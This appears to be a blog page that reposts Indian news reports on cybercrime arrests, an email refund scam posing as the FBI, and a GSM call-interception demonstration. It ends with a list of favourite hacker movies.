All in all, we as a country need to develop a culture of security through proper training—be it at school level, college level or at organization level. As the Chinese philosopher Confucius rightly said, “Success depends upon previous preparation, and without such preparation there is sure to be a failure.”



Reference : http://www.expresscomputeronline.com/20090803/market01.shtml

Kandivli businessman in connection with a cheating and hacking case

The cyber crime cell of the Bangalore police last week arrested a Kandivli businessman in connection with a cheating and hacking case registered there.

The accused, Yashwant Mairale (39), is a resident of Kandivli. Mumbai police sources confirmed that they assisted the Bangalore team, headed by S S Muddegowda, which had come in search of Mairale. He was produced before the Ballard Pier court by the Bangalore cops, seeking his transfer warrant. He will be produced before the first class magistrate court in Bangalore on Friday.

The case pertains to a complaint of cheating by S Rangaswamy, a resident of Bangalore, who alleged that someone had hacked into his ICICI e-banking account and stolen Rs 2.50 lakh. When he checked the account in December last year, he was shocked to discover that Rs 2.50 lakh had been transferred into three accounts.

A case of cheating was registered by the Cantonment police. But as it pertained to a hacking offence, the case was transferred to the CID’s cyber cell. During investigations, the police found that one of the beneficiaries, Sukresh Das, had an account at the SBI’s branch in West Bengal.

But the police were unable to trace any such person. However, they found that Rs 50,000 was transferred into Mairale’s account in Mumbai.


With internet users becoming aware about email scams, fraudsters have upped their game and are using ingenious methods to extract money from unsuspecting netizens.

The latest fraud email doing the rounds lists the Federal Bureau of Investigation (FBI) as the sender. The email offers to refund money you may have lost in an internet fraud in the past. But don’t hit the ‘reply’ button with your personal details. All these emails are fake. To make the emails look authentic, the fraudsters have provided the address of the FBI headquarters at Washington DC along with the investigating department. The National Association of Software and Service Companies (Nasscom) has written to the FBI, asking the agency to look into the matter.

The email is written by one Thomas Green who claims to be an agent with the FBI’s Internet Crime Complaint Center. The email states that six people have been arrested in connection with an email fraud, where they duped recipients into parting with money. A part of the amount, approximately US $ 2.5 lakh, has been recovered and can be refunded to the fraud victims through an ATM card, the email states. The card will be dispatched after the recipient provides personal information to another agent, Fredy Simon, the email adds.

“A month ago, I received a similar email, where the sender said he represented the United Nations and a committee had been created to refund money to victims of a phishing fraud. The email carried the UN logo and pictures of the secretary-general,” said technology evangelist Vijay Mukhi. “It’s best to delete such emails,” he added.

“This is a variation of the Nigerian scam,” said Pratap Reddy, director of cyber security at Nasscom. “If you haven’t lodged a police complaint, there’s no question of being contacted by an agency. If a complaint has been lodged, then a foreign agency like the FBI will have to go through proper diplomatic channels such as the Interpol. State CID is the nodal agency that would co-ordinate. The FBI will never approach an Indian citizen directly,” Reddy added.

Jealous colleague turns to Orkut for revenge, arrested

Accused Anand Bilore created a fake profile of his workmate on the social networking site, and sent obscene messages from it to female colleagues in the company

There is nothing called healthy competition at the workplace. Especially if at stake is a coveted ‘best employee’ award, a promotion and the promise of a better life.

Allegedly driven by professional jealousy, an assistant manager with Kotak Life Insurance created a fake Orkut profile of his colleague with the intention of discrediting him. Thane’s Cyber Crime Cell arrested him and his associate on Tuesday after he used the social networking profile to send obscene messages to female colleagues. The accused, Anand Ishwar Bilore, 21, and his associate, Vishal Changani, 23, an estate agent, are from Chembur.

A Cyber Crime Cell officer said, “Bilore was working with the insurance company for the last couple of years while Nirmale joined only recently. Nirmale’s meteoric rise in the organisation obviously did not go down well with Bilore, especially after he won the best employee award and was promoted to the post of assistant manager.”

“In order to embarrass his colleague, Bilore allegedly created his fake profile on Orkut from his friend Changani’s computer,” said Chandrakant Joshi, senior police inspector of the Cyber Cell.

“The accused scrapped all his female employees in the organisation and also sent them vulgar messages. When the women cross-checked with Nirmale he clarified his stand and lodged a complaint,” Joshi added.

Nirmale’s father Balasaheb said, “My son was upset when his female colleagues complained to him about the lurid messages. He was doing well at work, which I think upset Bilore as he belonged to a rival clique.”

On investigating, the police discovered that the computer belonged to Changani who was then arrested. Changani then informed the police about Bilore’s involvement.

Both were booked under the Information Technology Act and were let off on bail.

“Strict disciplinary action is being taken against the erring individual. We place high emphasis on ethical conduct in personal and professional dealings of employees and misdemeanors of any sort are not tolerated,” said Sugata Dutta, Head of Human Resources, Kotak Life Insurance.

CYBER COPS CRACK RS 65K FRAUD

Duo hacks website, books int’l tickets

Mumbai: Two persons hacked into the website of an authorised travel agent of a domestic airline, causing a loss of more than Rs 65,000 to the latter. But their fraud was detected and they ended up in the police net.

The two hacked into the website of an Andheri travel agent of Indigo Airlines. They booked international tickets that caused a loss to Indigo Airlines to the tune of Rs 65,152. However, the duo was nabbed by the cyber police on Tuesday. The two accused, who have been identified as Prashant Amarnarayan Jha (36) and Sudipkumar Sinha (30), have been booked under the Information Technology Act of 2000 and have been remanded to police custody. While Jha is a resident of Nallasopara, Sinha is his associate and a resident of Marol in Andheri.

According to the police, the complaint was filed by one Arun Shetty who is the authorised ticket agent of Indigo Airlines having an office under the name of Ramkrishna Travels and Tours in Andheri.

Shetty was shocked recently when the airline furnished him with an extra bill for a few international tickets which he had not issued. During the course of investigations, it came to light that somebody had hacked into the website of the travel agent and issued two international air tickets. The cyber police traced the IP address to Nalasopara. The police raided Jha’s residence and arrested him.

Tap mobiles with a $1,500 device now

A COMPUTER SECURITY RESEARCHER has built a device for just $1,500 that can intercept some kinds of cell phone calls and record everything that’s said.

The attack Chris Paget showed illustrates weaknesses in GSM, one of the world’s most widely-used cellular communications technologies. His attack was benign; he showed how he could intercept a few dozen calls made by fellow hackers in the audience for his talk at the Defcon conference here.

But it illustrates that criminals could do the same thing for malicious purposes, and that consumers have few options for protecting themselves.

Paget said he hopes his research helps spur adoption of newer communications standards that are more secure.

“GSM is broken — it’s just plain broken,” he said. GSM is considered 2G, or “second generation,” cellular technology. Phones that run on the newer 3G and 4G standards aren’t vulnerable to his attack.

If you’re using an iPhone or any other smart phone and the screen shows that your call is going over a 3G network, for example, you are protected. Blackberry phones apply encryption to calls that foil the attack, Paget pointed out.

But if you’re using a type of phone that doesn’t specify which type of network it uses, those phones are often vulnerable, Paget said. Paget’s device tricks nearby cell phones into believing it is a legitimate cell phone tower and routes their calls through it.

Man arrested for mailing ex-colleague’s ‘lewd’ pics

Mumbai: The cyber crime cell of Mumbai police on Wednesday arrested a 23-year-old executive working for a multinational company in Andheri for allegedly hacking into his ex-colleague’s email ID and sending morphed obscene pictures of her to her friends.

The accused, Prashant Vilas Desai, was arrested after the police tracked down the IP address to his laptop. “We have booked Desai on charges of cheating, breach of trust and Sections of the Information Technology Act. He has been remanded in police custody,” said a cyber crime cell official.

The 22-year-old victim worked as an administrative assistant with the same company where Desai was employed. Desai was attracted to her. Though she treated him like a friend, Desai mistook her actions and approached her parents with a marriage proposal, the official added.

The victim’s parents turned his proposal down. Soon after, he allegedly started stalking her. He would call her repeatedly and send her emails. “She left that organization and joined another company as sales coordinator. On May 26, Desai called her mother up and told her that she was sending him emails expressing her love for him. Later, he even showed her mother printouts. The victim’s mother told her to close the email account and start a fresh one,” the officer said.

“On June 21, some of her friends informed the victim that someone had sent obscene pictures of her from her email, giving out her details and phone number. When the victim logged into her account, she was shocked to see the emails,” the officer said.

Sunday, November 7, 2010

Friday, November 5, 2010

My Favorite Hacker Movies

Hacker living in Russia, gets tied into the mafia.
Takedown
Avoid at all cost. It's a piss poor movie and full of lies. Look up "Freedom Downtime", a documentary on the 'Free Kevin' movement. You'll quickly understand.

Untraceable
Quite a talented hackers movie... thrilling. It also shows the ways of the FBI cybercrime unit tracking the target site.

Serial Experiments Lain
13-part Japanese anime series made for TV. More about philosophy and conspiracy theory than hacking, but everything revolves around computers and the internet.

Code Hunter
Low budget flick with hacking, VR and AI. Preposterous but still enjoyable.

Die Hard 4
This is a very good hacking-based movie. I am very impressed by this movie and I also want to become a hacker.

Cloak and Dagger
A classic! I watched this several times as a kid. War Games is still number 1 though.

The Bourne Ultimatum
The CIA needs to hack the mail server of a newspaper (The Guardian UK) to read the email of a reporter they assassinated. So they turn to Nmap and Zenmap GUI to hack the mail server.

The Girl with the Dragon Tattoo
Based on the internationally bestselling novel by Stieg Larsson, this film follows Lisbeth, a troubled young hacker suffering from Asperger syndrome and a history of abuse by authority figures, as she works with a journalist trying to solve a 40-year-old murder mystery.

Khottabych
A teenage hacker (Gena) uses Nmap and Telnet to deface microsoft.com. Microsoft and the US authorities are understandably upset by the attack, so they send the attractive female hacker Annie to flush him out. The movie also features an epic battle between powerful genies (the kind which come in a bottle) fighting for dominion over Earth.

The Listening
A former NSA officer who defects and mounts a clandestine counter-listening station high in the Italian Alps. Nmap and NmapFE can be seen in action.

Battle Royale
One of the students is a hacker, and can be seen referencing Nmap source code.

Hackers
Perhaps this is not a good movie if you're a real hacker, but personally I thought it was awesome!

Cypher
I suppose I would add the movie Cypher as a notable mention. It's a decent sci-fi flick with what was supposed to be The Matrix influences. No hacking per se, except loading virii.